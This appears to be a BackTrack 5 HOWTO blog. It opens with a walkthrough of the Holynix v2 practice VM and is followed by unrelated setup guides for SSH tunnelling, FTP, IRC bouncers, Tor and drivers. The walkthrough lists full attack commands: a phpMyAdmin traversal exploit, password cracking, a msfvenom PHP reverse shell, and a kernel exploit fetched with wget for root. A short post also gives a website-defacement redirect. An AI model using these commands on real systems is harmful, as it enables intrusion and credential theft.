Cracked FTP passwords (John The Ripper)
Uploaded a web backdoor (Metasploit)
Escalated privileges via a vulnerable kernel version
Located MySQL database details

What do I need?

kolynix-v2.tar.bz2 (MD5: 2B91038DE5C5150BFC48AA39C84E7E71) – (Homepage).
A virtual machine (Example: Virtual Box or VMware Player).
Netdiscover – (Can be found on BackTrack 5).
Nmap – (Can be found on BackTrack 5).
Unicornscan – (Can be found in BackTrack 5's repository).
DirBuster – (Can be found in BackTrack 5).
Exploit-DB – (Can be found on BackTrack 5).
John The Ripper – (Can be found on BackTrack 5).
Metasploit – (Can be found on BackTrack 5).

Walkthrough

To begin, the attacker needed to locate the target. This was accomplished by using "netdiscover", as it was able to scan for hosts on multiple IP ranges quickly. The output from the scan had the target on a different IP range from the DHCP server's pool, meaning the target had a static IP address. The IP address, MAC address and vendor was now known to the attacker and they updated their IP address to fit inside the same IP range as the target.

Once the attacker was in the same subnet as the target, the attacker completed a full port scan of both TCP & UDP on the target by using "unicornscan". When the scan had finished, the results showed that the target had four TCP ports open: 21, 22, 53 & 80, as well as one UDP port, 53.

Afterwards, the attacker wanted to know what services were being used on these ports. By using "nmap" to banner grab the services, the protocols and services (and possible versions) were able to be identified, along with finger printing the operating system which was being used. The outcome of the scan revealed that the services being used matched up to their default protocol ports; ftp, ssh, dns and web services.

The attacker then proceeded by interacting with the target's web server, and by doing so, they were able to find some useful information; the domain name, name servers and each user had their own sub-domain. The attacker updates their system to reflect the newly discovered information by replacing the DNS server to point to the target.

The attacker then sets out to produce a list of possible usernames via the sub-domain by using DNS enumeration. By using "dig" the attacker was able to gather details about the domain, zincftp.com. This revealed that there were two DNS servers; the primary server was pointed to itself, the secondary server had an IP address increased by one of the primary servers. From the earlier nmap scan, the attacker knew that this IP address wasn't currently being used. The attacker then attempted a zone transfer as DNS port (TCP 53) was open, which would clone the DNS database; however it failed. But, by the attacker changing their IP address to match the secondary DNS server and re-trying the request, this time the attacker was presented with a list of all the known values for the DNS service.

The next stage was to extract a list of all known hosts from the sub-domains as well as a possible list of usernames. Upon futher inspection of the list, the attacker then filtered out all the primary server values - which left a few interesting results such as; the nameservers (which were already known), a mail server (which was on a completely different IP range) and trusted.zincftp.com.

The attacker then moves their force back to the web server. "DirBuster" was able to brute force a list of directories on a web server and check their status. In the first scan, the attacker notices two folders (/phpMyAdmin/ & /setup_guide/) which returned "HTTP response code 403 - Forbidden". The attacker then changes their IP address to match the same value as "trusted.zincftp.com" and re-open another instance of DirBuster to compare the output. After the second scan had completed, the two previous denied folders, had returned "HTTP response code 200 - OK". The attacker then chooses to view what was meant to be hidden and discovers that one page is an unprotected phpMyAdmin page as well as a directory listing which only contained one file "todo".

By exploring the phpMyAdmin page, the attacker was able to view the contents of the database which contained two usernames and their email addresses, which the attacker adds to their list of known users. Afterwards, the attacker checks the version of phpMyAdmin and notices it's a very old version and checks to see if there has been any known exploits released for it in their local copy of public exploits from "exploit-db". After checking the versions the attacker discovers that there is a remote directory traversal vulnerability.

The exploit allowed the attacker to view any files which had the same permission that phpMyAdmin was being run as. By using this, the attacker was able to discover all the user accounts on the system, by using a known file which commonly contains details of each user on the system (/etc/passwd). After analysing the file the attacker saw that not every user had shell access, and filtered these users out, as they wouldn't be able to gain remote shell. The attacker then made a note of those usernames in a separate file, as they have higher priority.

Afterwards the attacker viewed the "todo" file on the web server, which displayed the internal working of the company when a new user is added to the system. The last stage was to add them to the FTP service, allowing them to download/upload files to the server. By using the phpMyAdmin exploit, the attacker was able to read the encrypted password file which contained the user credentials.

The attacker now had a local copy of the users which were allowed to use the FTP service, along with their passwords, however, it was encrypted. The attacker then locates a small wordlist to attempt to brute force the passwords. After loading the passwords and wordlist into "John The Ripper", the attacker discovered two passwords (jack-in-the-box and millionaire) which were used (due to them being inside the wordlist), along with the two usernames (dhammond and tmartin).

As the attacker was now able to view the user web folder via [username].zincftp.com, as well as being able to interact with the ftp server, the attacker created and uploaded a small test file to see if the two services overlapped with each other. (Editor's note: The VM at this stage had "run out of room", however, after restarting the holynix virtual machine it worked). The result was the message "Hello World" was displayed, meaning; FTP & Web root folders were the same, the attacker was able execute PHP commands. From this, the attacker then crafts a web based backdoor via "metasploit", setups a listener to catch the reverse connection and repeated the same procedure as before.

As soon as the php backdoor file was opened, it connected back to the attacker giving them remote access to the system, which allowed the attacker to interact with the operating system. The attacker continued by listing all the files of each user's personal home folder. As the backdoor was executed by the web server, the backdoor inherited the same permissions, and, as the web server had to display each user folder the attacker can also do the same. There were various personal files to some users; however the attacker spotted an email, and upon reading it discovered that the user had their password reset to their name along with a few random characters. The attacker located the username the email was sent to, after looking up the user's details by using the same file as before (/etc/passwd), to discover their full name. It was also a user that had been discovered before, due to the user having permission to login remotely.

The attacker now connects to the target via "SSH" with the newly acquired details and as a result had a remote TTY shell. The attacker then checked the current kernel version, and discovered like phpMyAdmin, it was out-dated, and checks in the same manner to see if there is a public exploit for it. After locating a possible exploit, the attacker then copied it to their root web folder, checked that the file had permission to be accessed by "Apache", that there wasn't any comments at the start of the file and then started the web server, to make the file accessible to the target.

Going back to the target, the attacker navigates to a folder which they usually have write access as well as the ability to execute programs, /tmp. The attacker then downloads the exploit locally on the target and then compiles it. As soon as the newly created program had been executed the attacker became the super user, root. The attacker now has access to the complete system...

Game over

The attacker decided that they wished to harvest the system for credentials. As databases can contain valuable and sensitive information, the attacker opted to gain access. The attacker was running as root, which would allow them to reset the password to anything they wished. However, this would have caused the functionality to stop, so instead they located them (as they had to be stored somewhere allowing the web server to interact with the database). The attacker navigated to a common location for the web root folder to be, and then, by searching for all files with php extension that use a common function to connect to a MySQL database, the attacker found all the insistences of the command. The attacker was then able to view the complete file which contained the phrase, and discovered the credentials in plain text.

Commands

netdiscover
ifconfig eth0
ifconfig eth0 192.168.1.192
ifconfig eth0
us -H -msf -Iv 192.168.1.88 -p 1-65535 && us -H -mU -Iv 192.168.1.88 -p 1-65535
nmap -p 1-65535 -T4 -A -v 192.168.1.88
firefox 192.168.1.88
echo www.zincftp.com 192.168.1.88 >> /etc/hosts
cat /etc/hosts
echo nameserver 192.168.1.88 > /etc/resolv.conf
cat /etc/resolv.conf
dig zincftp.com @192.168.1.88
dig AXFR zincftp.com @192.168.1.88
ifconfig eth0 192.168.1.89
dig AXFR zincftp.com @192.168.1.88
dig AXFR zincftp.com @192.168.1.88 | grep zincftp.com | grep -v ";" | cut -f1 - | sort | uniq
dig AXFR zincftp.com @192.168.1.88 | grep zincftp.com | grep -v ";" | cut -f1 - | sort | uniq > /tmp/hosts
dig AXFR zincftp.com @192.168.1.88 | grep zincftp.com | grep -v ";" | cut -d . -f1 - | sort | uniq
dig AXFR zincftp.com @192.168.1.88 | grep zincftp.com | grep -v ";" | cut -d . -f1 - | sort | uniq > /tmp/users
dig AXFR zincftp.com @192.168.1.88 | grep -v 192.168.1.88 | grep -v ";"
BackTrack -> Vulnerability Assessment -> Web Application Assessment -> Web Application Fuzzers -> DirBuster # http://192.168.1.88 directory-list-2.3-medium.txt
ifconfig eth0 192.168.1.34
BackTrack -> Vulnerability Assessment -> Web Application Assessment -> Web Application Fuzzers -> DirBuster # http://192.168.1.88 directory-list-2.3-medium.txt
Right Click -> Open In Broswer # /phpMyAdmin/ /setup_guide/
phpMyAdmin -> zincftp_data -> browse # shanover & lbaumann
phpMyAdmin -> home -> changelog
cd /pentest/exploits/exploitdb
grep -i phpmyadmin files.csv
perl platforms/php/webapps/1244.pl
perl platforms/php/etc/passwd
perl platforms/php/etc/passwd | grep /bin/bash | cut -d ":" -f1
perl platforms/php/webapps/1244.pl 192.168.1.88 /phpMyAdmin/ ../../../../../etc/passwd | grep /bin/bash | cut -d ":" -f1 > /tmp/sshUsers
firefox http://192.168.1.88/setup_guide/ -> todo
perl platforms/php/etc/pure-ftpd/pureftpd.passwd
perl platforms/php/etc/pure-ftpd/pureftpd.passwd | grep :/
perl platforms/php/etc/pure-ftpd/pureftpd.passwd | grep :/ > /tmp/ftpUsers

cd /pentest/passwords/john
find / -name password.lst
wc -l /pentest/passwords/wordlists/darkc0de.lst
wc -l /opt/framework3/msf3/data/john/wordlists/password.lst # Much smaller, therefore quicker!
./john --wordlist=/opt/framework3/msf3/data/john/wordlists/password.lst /tmp/ftpUsers # --rules
ftp 192.168.1.88 # dhammond jack-in-the-box
ls
cd web

echo "" > test.php

put test.php

curl dhammond.zincftp.com/test.php
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.34 LPORT=443 -f raw > evil.php
msfcli multi/handler PAYLOAD=php/meterpreter/reverse_tcp LHOST=192.168.1.34 LPORT=443 E

put evil.php

curl dhammond.zincftp.com/evil.php && exit

sysinfo
shell
id
python -c 'import pty; pty.spawn("/bin/sh")'
ls -lAhR /home
cat /home/amckinley/my_key.eml #first and last name, all lower case, followed by 2ba9
grep amckinley /etc/passwd # Agustin Mckinley
exit

quit
ssh amckinley@zincftp.com # agustinmckinley2ba9
id
uname -a

exit
exit
exit
cd /pentest/explotis/exploitdb
grep -i "linux kernel 2.6" files.csv | grep -i root #| uniq # grep -i dos
cp platforms/linux/local/5092.c /var/www/exploit.c
/etc/init.d/apache2 start
ls -l /var/www/exploit.c
head -n 20 /var/www/exploit.c # Check to make sure vaild code

cd /tmp
ls -la
wget 192.168.1.34/exploit.c
gcc exploit.c -o root
ls -la
./root
id && ifconfig && uname -a && cat /etc/shadow && ls -lahR /root
cd /var/www
find ./ -name *.php -print0 | xargs -0 grep -i -n "mysql_connect"
cat dev/dbconn.php
cat htdocs/dbconn.php

Notes

- When starting the VM for the first time with VMware, select "Moved It" - otherwise it could cause issues (e.g. the target will not be visible!).
- The user names which were collected were not essential for this, however this was included to demonstrate the techniques.
- On reflection, DirBuster was only used to visible compare the HTTP codes, depending on the IP address used. This could of been achived manually as checking "/phpMyAdmin/" is highly recommend (along with "/robots.txt" for example). Then by using the phpMyAdmin exploit, viewing the file "/etc/apache2/sites-enabled/000-default" would have revealed "/setup_guides/".
- Some mistakes in the video are more obvious.
- This video has been "over-edited" more than most of the other videos as it was made to fix the length of music.

That's all! See you.

HOWTO : Deface a website fast

*** Do NOT attack any website without authorization or you may put into jail. ***

Credit to : pr0xzy

This is not my work. I re-post it here for educational purpose only.



Command

<meta http-equiv="refresh" content="0; URL=http://some.domain.com"/>

That's all! See you.

HOWTO : SSH Tunneling - Remote Port Forwarding

WARNING : Do NOT attack any computer or network without authorization or you will be put into jail.

Scenario :

Victim Machine A and B (both are Windows XP machines) are in the same internal network. Victim A is connected to the internet while B is not.

Attacker gets the remote shell of A in the first hand and then further gets the remote shell of B by the SSH tunneling technique.

Background Music :

Infected Mushroom 09 Franks (by Offensive Security)

Operating Systems on VirtualBox :

(1) Back|Track 5 R1
(2) Windows XP SP1 (Traditional Chinese)


That's all! See you.

HOWTO : SSH Tunneling with Dynamic Port Forwarding

To ensure your connection under encrypted without changing the installation or configuration of application softwares.

Step 1 :

Download the following file on the SSH server (any computer that will be running 24/7, the most perfect) on any computer outside your network.

sudo apt-get update
sudo apt-get install openssh-server

PART I - FIREFOX

Step 2 :

Open Firefox and select "Edit" -- "Preference". "Advanced" -- "Network" -- "Connection".

Select "Manual Proxy setting".

SOCKS Host : localhost
Port : 1080

Step 3 :

Go the the address entry field.

about:config

search for "network.proxy.socks_remote_dns" and double click it to set it to "true".

Close the Firefox.

PART II - FILEZILLA

Step 4 :

Open Filezilla. "Edit" -- "Settings" -- "Common Proxy".

Select "SOCKS 5"

Proxy Host : localhost
Proxy Port : 1080
Proxy User : <Your username>
Proxy Password : <Your password>

PART III - FINAL

Step 5 :

Open a terminal.

ssh -C -D 1080 <SSH Server IP or Hostname>

Enter your password.

Remarks :

Make sure the terminal window keeping open. Otherwise, the SSH tunneling will quit.

Step 6 :

Restart Firefox and surf the internet. And use Filezilla to download or upload files.

That's all! See you.

HOWTO : Pure-ftpd and atftpd on Back|Track 5

You may use FTP and/or atftpd services on Back|Track 5. The following tutorial is showing you how to set it up on Back|Track 5.

PART I - PURE-FTPD

Step 1 :

apt-get install pure-ftpd

Step 2 :

cd /etc/pure-ftpd/conf/

echo ,21 > Bind

Step 3 (Optional) :

If you are behind NAT, you should set the following. The IP of your machine is suppose to be 192.168.1.1 and the passive ports are between 5000 and 5600.

echo 192.168.1.1 > ForcePassiveIP
echo 5000 5600 > PassivePortRange

Step 4 (Optional) :

The following settings are for security only. It is optional :

echo yes > ChrootEveryone
echo yes > ProhibitDotFilesRead
echo yes > ProhibitDotFilesWrite
echo yes > NoChmod
echo yes > BrokenClientsCompatibility

Step 5 :

The following settings are for preventing abuse :

echo 4 > MaxClientsPerIP
echo 20 > MaxClientsNumber

Step 6 :

To use PureDB authentication :

echo no > PAMAuthentication
echo no > UnixAuthentication
echo /etc/pure-ftpd/pureftpd.pdb > PureDB
ln -s /etc/pure-ftpd/conf/PureDB /etc/pure-ftpd/auth/50pure

Step 7 :

groupadd -g 2001 ftpgroup
useradd -u 2001 -s /bin/false -d /bin/null -c "pureftpd user" -g ftpgroup ftpuser

Step 8 :

Create a virtual user - samiux :

pure-pw useradd samiux -u ftpuser -d /ftphome/

pure-pw mkdb

*** "pure-pw mkdb" should be issued when a new user is added.

*** Make sure you have a directory /ftphome.

Step 9 :

Add TLS/SSL support and generate a private certificate :

cd /etc/pure-ftpd/conf/
echo 1 > TLS
openssl req -x509 -nodes -newkey rsa:1024 -keyout /etc/ssl/private/pure-ftpd.pem -out /etc/ssl/private/pure-ftpd.pem

chmod 600 /etc/ssl/private/pure-ftpd.pem

Restart the pure-ftpd (or reboot your system) :

/etc/init.d/pure-ftpd restart

Remarks :

I encounter a problem when login to the pure-ftp as invalid username and password. I reboot the system and the problem gone.

PART II - ATFTPD

Step a :

cp /etc/default/atftpd /etc/default/atftpd-old

nano /etc/default/atftpd

Step b :

Change the content as is :

USE_INETD=false
OPTIONS="--tftpd-timeout 300 --retry-timeout 5 --maxthread 100 --verbose=5 --daemon --port 69 /tftpboot"

Step c :

/etc/init.d/atftpd restart

*** Make sure you have a directory /tftpboot.

That's all! See you.

HOWTO : Anonymous in chat.freenode.net with XChat

IRC will display your IP address to other users that online. However, you can hide it by using IRC Proxy or Bouncer.

PART I - MY-BNC.NET

First of all, go to My-BNC.net to register an account. For example, the username is android and password is androidpass. Then, login with your username and password that registered before.

Step 1 :

Go the the menu on the browser, choose "Setting" to setup your account.

(a) Server setting

ssl = on
port = 7000
server = chat.freenode.net
password = <Do not require>
vhost = my-bnc.net

perform 1 = JOIN #<Your Channel>

(b) User setting

Realname = My-BNC User
Nickname = android
Password = androidpass

Profile = Private

(c) Services Authorisation & NickServ

Auth name = android
Auth password = androidpass
Auto-auth = on

PART II - XCHAT AND ZNC

Step 2 :

sudo apt-get update
sudo apt-get install znc xchat

Step 3 :

znc --makeconf

[ ** ] Building new config
[ ** ]
[ ** ] First lets start with some global settings...
[ ** ]
[ ?? ] What port would you like ZNC to listen on? (1 to 65535): 6697
[ ?? ] Would you like ZNC to listen using SSL? (yes/no) [no]: yes
[ ** ] Unable to locate pem file: [/home/samiux/.znc/znc.pem]
[ ?? ] Would you like to create a new pem file now? (yes/no) [yes]:
[ ?? ] hostname of your shell (including the '.com' portion): irc.my-bnc.net
[ ok ] Writing Pem file [/home/samiux/.znc/znc.pem]...
[ ?? ] Would you like ZNC to listen using ipv6? (yes/no) [no]:
[ ?? ] Listen Host (Blank for all ips):
[ ** ]
[ ** ] -- Global Modules --
[ ** ]
[ ?? ] Do you want to load any global modules? (yes/no): yes

[ ** ] And 10 other (uncommon) modules. You can enable those later.
[ ** ]
[ ?? ] Load global module <partyline>? (yes/no) [no]:
[ ?? ] Load global module <webadmin>? (yes/no) [no]: yes
[ ** ]
[ ** ] Now we need to setup a user...
[ ** ]
[ ?? ] Username (AlphaNumeric): android
[ ?? ] Enter Password: androidpass
[ ?? ] Confirm Password: androidpass
[ ?? ] Would you like this user to be an admin? (yes/no) [yes]:
[ ?? ] Nick [android]:
[ ?? ] Alt Nick [android_]:
[ ?? ] Ident [android]:
[ ?? ] Real Name [Got ZNC?]:
[ ?? ] VHost (optional):
[ ?? ] Number of lines to buffer per channel [50]: 500
[ ?? ] Would you like to keep buffers after replay? (yes/no) [no]:
[ ?? ] Default channel modes [+stn]:
[ ** ]
[ ** ] -- User Modules --
[ ** ]
[ ?? ] Do you want to automatically load any user modules for this user? (yes/no): yes

[ ** ] And 33 other (uncommon) modules. You can enable those later.
[ ** ]
[ ?? ] Load module <admin>? (yes/no) [no]: yes
[ ?? ] Load module <chansaver>? (yes/no) [no]: yes
[ ?? ] Load module <keepnick>? (yes/no) [no]: yes
[ ?? ] Load module <kickrejoin>? (yes/no) [no]:
[ ?? ] Load module <nickserv>? (yes/no) [no]:
[ ?? ] Load module <perform>? (yes/no) [no]:
[ ?? ] Load module <simple_away>? (yes/no) [no]: yes
[ ** ]
[ ** ] -- IRC Servers --
[ ** ]
[ ?? ] IRC server (host only): freenode
[ ?? ] [freenode] Port (1 to 65535) [6667]: 7000
[ ?? ] [freenode] Password (probably empty):
[ ?? ] Does this server use SSL? (probably no) (yes/no) [no]: yes
[ ** ]
[ ?? ] Would you like to add another server? (yes/no) [no]:
[ ** ]
[ ** ] -- Channels --
[ ** ]
[ ?? ] Would you like to add a channel for ZNC to automatically join? (yes/no) [yes]: yes
[ ?? ] Channel name: <Your Channel>
[ ?? ] Would you like to add another channel? (yes/no) [no]:
[ ** ]
[ ?? ] Would you like to setup another user? (yes/no) [no]:
[ ok ] Writing config [/home/samiux/.znc/configs/znc.conf]...
[ ** ]
[ ** ] To connect to this znc you need to connect to it as your irc server
[ ** ] using the port that you supplied. You have to supply your login info
[ ** ] as the irc server password like so... user:pass.
[ ** ]
[ ** ] Try something like this in your IRC client...
[ ** ] /server 6697 android:<pass>
[ ** ]
[ ?? ] Launch znc now? (yes/no) [yes]:
[ ok ] Opening Config [/home/samiux/.znc/configs/znc.conf]...
[ ok ] Binding to port [+6697] using ipv4...
[ ** ] Loading user [samiux]
[ ok ] Loading Module [admin]... [/usr/lib/znc/admin.so]
[ ok ] Loading Module [chansaver]... [/usr/lib/znc/chansaver.so]
[ ok ] Loading Module [keepnick]... [/usr/lib/znc/keepnick.so]
[ ok ] Loading Module [simple_away]... [/usr/lib/znc/simple_away.so]
[ ok ] Adding Server [freenode +7000]...
[ ok ] Loading Global Module [webadmin]... [/usr/lib/znc/webadmin.so]
[ ok ] Forking into the background... [pid: 9141]
[ ** ] ZNC 0.092+deb3 - http://znc.sourceforge.net


*** In case, you make a mistake and want to re-generate the config file. You should delete the "znc.conf" under "/home/<Your name>/.znc".

rm -R .znc

Step 4 :

Open XChat. Under the "Network List" window :

User Information

Nickname : android
Second choice : android_
Third choice : android__
User name : android
Real name : Android

Press "Add" button on the right. Then name it to "My-BNC BNC" and highlight it. Choose "Edit", on the top big box change to "irc.my-bnc.net/6697".

Only connect to chosen network : enable
Auto connect to this network : enable

Username : android

Use SSL for all servers in this networks : enable
Accept invalid certificate : enable

Server password : androidpass

Step 5 :

Choose "Connect" on the XChat window.

That's all! See you.

HOWTO : Yet Another Update script for Back|Track 5

Maxfx at Back|Track Linux developed a script for updating the Back|Track 5 which is written in Python. You can update the Back|Track 5 and it's applications in one script.

The current version is 0.6 at the time of this writing.

wget http://bl4ck5w4n.tk/wp-content/uploads/2011/07/bt5up.tar

tar -vxf bt5up.tar

Usage :

./bt5up.py

You can also move the execute file to /bin or /usr/bin. Once moved the file to /bin or /usr/bin, you can run the script as the following :

bt5up.py

Source :

Yet Another Update script on Back|Track 5 forum

Remarks :

Another update script written in C

That's all! See you.

HOWTO : Register to OSVDB and Nessus on Back|Track 5

PART I : OSVDB

Go to http://osvdb.org to register your account and you will receive an email to activate your account.

After the activation your account, you can login to OSVDB. Go to "Account" -- "API" to copy the API code.

Open a terminal, issue the following command :

nano /pentest/enumeration/web/cms-explorer/osvdb.key

Copy the API code onto the osvdb.key file.

PART II : Nessus

Go to http://www.nessus.org/products/nessus/nessus-plugins/obtain-an-activation-code and select "Using Nessus at Home?" to register.

You will receive an email. Follows the instruction on the email to open a terminal and issue the command :

/opt/nessus/bin/nessus-fetch --register XXXX-XXXX-XXXX-XXXX-XXXX

To create a user :

/opt/nessus/sbin/nessus-adduser

** You can leave the rule field empty.

Start the Nessus from the menu of Back|Track 5, "BackTrack" -- "Vulnerability Assessment" -- "Vulnerability Scanners" -- "Nessus" -- "nessus start".

Or, just issue the following command :

/etc/init.d/nessusd start

After that, go to https://localhost:8834/

That's all! See you.

HOWTO : Solves the Wireshark not loading on Back|Track 5

Back|Track 5 comes with Wireshark 1.6.1 as at July 24, 2011 (GMT +8) However, it does not load properly due to missing a file namely "libwsutil.so.0".

Therefore, we need to compile the latest SVN version of Wireshark from source. The current SVN version is 1.7.0-SVN-38173 at time of this writing.

Step 1 :

Go http://www.wireshark.org/download/automated/src/ to get the latest version of the Wireshark. The latest version at the time of this writing is 1.7.0-SVN-38173.

*** Please note that the latest version as at July 25, 2011 is 1.7.0-SVN-38202.

apt-get update
apt-get install libtool flex libgtk2.0-dev lua50
apt-get install dpatch libc-ares-dev docbook-xsl libpcre3-dev libcap-dev libgnutls-dev libkrb5-dev liblua5.1-0-dev libsmi2-dev libgeoip-dev xsltproc automake1.9

Step 2 :

apt-get --purge remove wireshark

** Don't need to remove the previous wireshark. So that the menu entry can be reminded unchanged.

Step 3 :

tar -xvjf wireshark-1.7.0-SVN-<LATEST_VERSION>.tar.bz2

cd wireshark-1.7.0-SVN-<LATEST_VERSION>

Step 4 :

./autogen.sh
./configure
make debian-package

Step 5 :

cd ..

If you are installed 64-bit Back|Track 5 :

dpkg -i wireshark-common_1.7.0_amd64.deb wireshark_1.7.0_amd64.deb tshark_1.7.0_amd64.deb

OR

If you are installed 32-bit Back|Track 5 :

dpkg -i wireshark-common_1.7.0_i386.deb wireshark_1.7.0_i386.deb tshark_1.7.0_i386.deb

Step 6 :

/usr/bin/wireshark

That's all! See you.

HOWTO : Back|Track 5 on Lenovo ThinkPad X100e

Lenovo ThinkPad X100e (Type 3508-65B) is equipped with AMD Athlon Neo MV-40 CPU and Radeon Display card. It does not work properly on Back|Track 5.

This tutorial is going to show you how to install Back|Track 5 on the captioned hardware.

Step 1 :

Boot up the Live CD or Live USB. Select the first item. Press "Tab" key to add the following line to the end of the line displayed on the screen.

radeon.modset=0

Step 2 :

After the Live CD or Live USB is booting up, open terminal and then issue the following command.

nano /etc/default/grub

Locate :

GRUB_CMDLINE_LINUX_DEFAULT="text splash nomodeset vga=791"

Make it read as :

GRUB_CMDLINE_LINUX_DEFAULT="text splash nomodeset vga=791 radeon.modset=0"

Save and exit.

Step 3 :

update-grub
fix-splash

Step 4 :

Configure the wireless card.

HOWTO : RTL8191SE wireless card on Back|Track 4 R2

Step 5 :

Install of AMD Catalyst 11.6 Proprietary driver.

Go to AMD official site and download AMD Catalyst 11.6 Proprietary Linux x86 Display Driver which is released on June 15, 2011.

wget http://www2.ati.com/drivers/linux/ati-driver-installer-11-6-x86.x86_64.run
chmod +x ati-driver-installer-11-6-x86.x86_64.run
./ati-driver-installer-11-6-x86.x86_64.run

** My Back|Track 5 is 64-bit so I download the 64-bit version of the driver.

Follow the instruction on the screen to install the driver. After the installation, you should reboot your system.

Before reboot your system, issue the following command :

fix-splash

Step 6 :

Install Pointing Device Settings for the TrackPoint system.

apt-get install gpointing-device-settings

Go to "System" -- "Preferences" -- "Pointing Devices".

Select "TPPS/2 IBM TrackPoint". Choose "Use middle button emulation" and "Use wheel emulation". Select "2" for the button.

That's all! See you.

HOWTO : Adobe Flash 10.3 on Back|Track 5

Step 1 :

Go to Flash official site to download current version (tar.gz). It is 10.3.181.34 at the time of this writing.

Step 2 :

Close all running Firefox.

Extract the file "install_flash_player_10_linux.tar.gz".

tar -xvzf install_flash_player_10_linux.tar.gz

Step 3 :

Move the "libflashplayer.so" to its locations.

chown root:root libflashplayer.so
chmod 0644 libflashplayer.so
mv -f libflashplayer.so /usr/lib/mozilla/plugins/
ln -s /usr/lib/mozilla/plugins/libflashplayer.so /usr/lib/firefox/plugins/

Step 4 :

Delete the extracted files and directories.

rm -R usr

Source :

Backtrack 5 - How to get flash player working on Gnome / KDE x64

That's all! See you.

HOWTO : Update script for Back|Track 5

Sickness at Back|Track Linux developed a script for updating the Back|Track 5. You can update the Back|Track 5 and it's applications in one script.

The current version is 0.6 at the time of this writing.

wget http://sickness.tor.hu/wp-content/uploads/2011/06/backtrack5_update.c
gcc -o backtrack5_update backtrack5_update.c

Usage :

./backtrack5_update

You can also move the execute file to /bin. Once moved the file to /bin, you can run the script as the following :

backtrack5_update

Source :

Update script on Back|Track 5 forum

Remarks :

Another update script written in Python

That's all! See you.

HOWTO : FeedingBottle 3.2 on Back|Track 5

FeedingBottle is a Graphic User Interface (GUI) for Aircrack-ng and it is a project of Beini. Beini is based on Tiny Core Linux which is a wireless network security testing system.

FeedingBottle can handle WEP, WPA, WPA2 as well as hidden SSID.

FeedingBottle 3.2 is working well on Back|Track 5. You can download it at here. Extact and install it by the following commands.

wget http://www.ibeini.com/beini_system/others/feedingbottle/feedingbottle3.2-backtrack5-gnome.zip
unzip feedingbottle3.2-backtrack5-gnome.zip
dpkg -i feedingbottle3.2-backtrack5-gnome.deb

After the installation, you can find it at "Applications" -- "BackTrack" -- "Exploitation Tools" -- "Wireless Exploitation Tools" -- "WLAN Exploition" -- "FeedingBottle3.2".

For the usage, please visit the official site at here.

There are simple and advanced modes for you to use.

That's all! See you.

HOWTO : The Onion Router (Tor) on Back|Track 5

PART I : Browser

Step 1 :

nano /etc/apt/sources.list

Append the following line to the file.

deb http://deb.torproject.org/torproject.org lucid main

Step 2 :

gpg --keyserver keys.gnupg.net --recv 886DDD89
gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add -

apt-get update
apt-get install tor tor-geoipdb
apt-get install privoxy

Step 3 :

nano /etc/privoxy/config

Append the following line :

forward-socks4a / 127.0.0.1:9050 .

/etc/init.d/privoxy start
/etc/init.d/tor start

Step 3a (Optional) :

If you are behind firewall or NAT as well as router, you should append the following line at the configure file.

forward 192.168.*.*/ .

Step 4 :

Go to the Tor official site to download and install Tor button for Firefox.

Tor Button Plugin for Firefox

Step 5 :

Open Firefox. Go to "Tools" -- "Add-ons" -- "Extensions". Select "Torbutton's Preferences".

(a) At "Proxy Settings", unclick "Use Polipo".
(b) At "Security Settings", On browser startup, set Tor state to:" select "Tor".
(c) At "Display Settings", select "Icon".

** Now, your Firefox will enable Tor on every launch unless you disabled the "Tor Button" on the Firefox.

Step 6 (Optional) :

To check if it works or not. Go to the following sites to check your Ip address.

http://cmyip.com

or

http://whatismyip.com

or

http://check.torproject.org

PART II : Console

Step a :

apt-get install proxychains elinks

Step b :

nano /etc/proxychains.conf

Append the following line :

socks4 127.0.0.1 9050

** It should be there.

Step c :

Usage :

proxychains nmap google.com
proxychains elinks http://cmyip.com
proxychains elinks http://www.whatismyip.com

To see your real IP address :

elinks cmyip.com

That's all! See you.

HOWTO : Lenovo Active Protection System (HDAPS) on Ubuntu 11.04

HDAPS can protect against your laptop (Lenovo ThinkPad) from damaging the hard drive when the laptop is moving around.

Step 1 :

sudo apt-get update
sudo apt-get install tp-smapi-dkms hdapsd

Step 2 :

echo 'tp_smapi' | sudo tee -a /etc/modules
echo 'hdapsd' | sudo tee -a /etc/modules

Step 3 :

sudo modprobe tp_smapi
sudo /etc/init.d/hdapsd restart

** You just do Step 1 to Step 3 for one time only

Step 4 :

To test if the hdapsd is working or not, you just issue one of the following commands :

(a)
sudo find /

Then, move your laptop and to see if it can halt or not.

(b)
sudo hdapsd

Then, move your laptop and to see if it display "parking" or not.

Step 5 (Optional) :

You can adjust the sensitivity of the sensor by editing the following :

sudo nano /etc/default/hdapsd

Locate "SENSITIVITY" and adjust the value.

That's all! See you.

HOWTO : Yet Another Back|Track 5 on Dell Streak 5

I wrote a tutorial for Back|Track 5 on Dell Streak 5 with StreakDroid at here. Today, I would like to show you how to use SimpleStreak instead of StreakDroid.

Why use SimpleStreak? It is because SimpleStreak uses Official ROM with StreakDroid kernel. It is less bug comparing with StreakDroid. Furthermore, SimpleStreak is faster than StreakDroid.

The current version of SimpleStreak is 1.2 at the time of this writing. You can download it at here.

PART I - INSTALLATION OF SIMPLESTREAK

Step 1 :

First of all, you should make sure you have flashed StreakMod Recovery. You can download it (MultiRecovryFlasher.v0.7.rar at the time of this writing) at here.

Step 2 :

Download SimpleStreak 1.2 at here.

Rename it to update.zip and copy it to the root directory of the SD Card of your Streak.

Step 3 :

Switch off your Streak. Long press "Vol Up" + "Vol down" and then press "Power on". Long press those keys until you see the screen is boot up to recovery mode.

Select "2. Software upgrade via Update.pkg on SD Card" by pressing "Camera button". You will see a "Dell" logo and a "!" inside a triangle. Press "Power on" to the next menu.

Press "Vol up" or "Vol down" to move the cursor. Select "wipe the cache partition" and "wipe data/factory reset" by pressing "Camera button" one by one.

After that, press "Vol up" or "Vol down" to move the cursor. Select "sdcard:update.zip" by pressing "Camera button". Then choose, "Install".

Upon seeing "Installation Completed", press "Exit" button on the Streak to return to the previous menu. Then select "reboot system now".

Wait for the Streak to reboot. The first reboot takes longer time. Please be patient.

Step 4 :

Install the following apps from the Market for the running of Back|Track 5.

(1) Android Terminal Emulator by Jack Palevich
(2) Mocha VNC Lite by MochaSoft

** Step 1 to 4, just do them ONCE.

PART II - INSTALL BACK|TRACK 5 ON DELL STREAK

Step 5 :

Download the official Back|Track 5 ARM from the official site. Extract it and copy "busybox" and "installbusybox.sh" to the root directory of the SD card.

Open the Android Terminal Emulator and then execute

su
sh installbusybox.sh

** This step is just doing ONCE unless your ROM is reflashed or updated.

Step 6 :

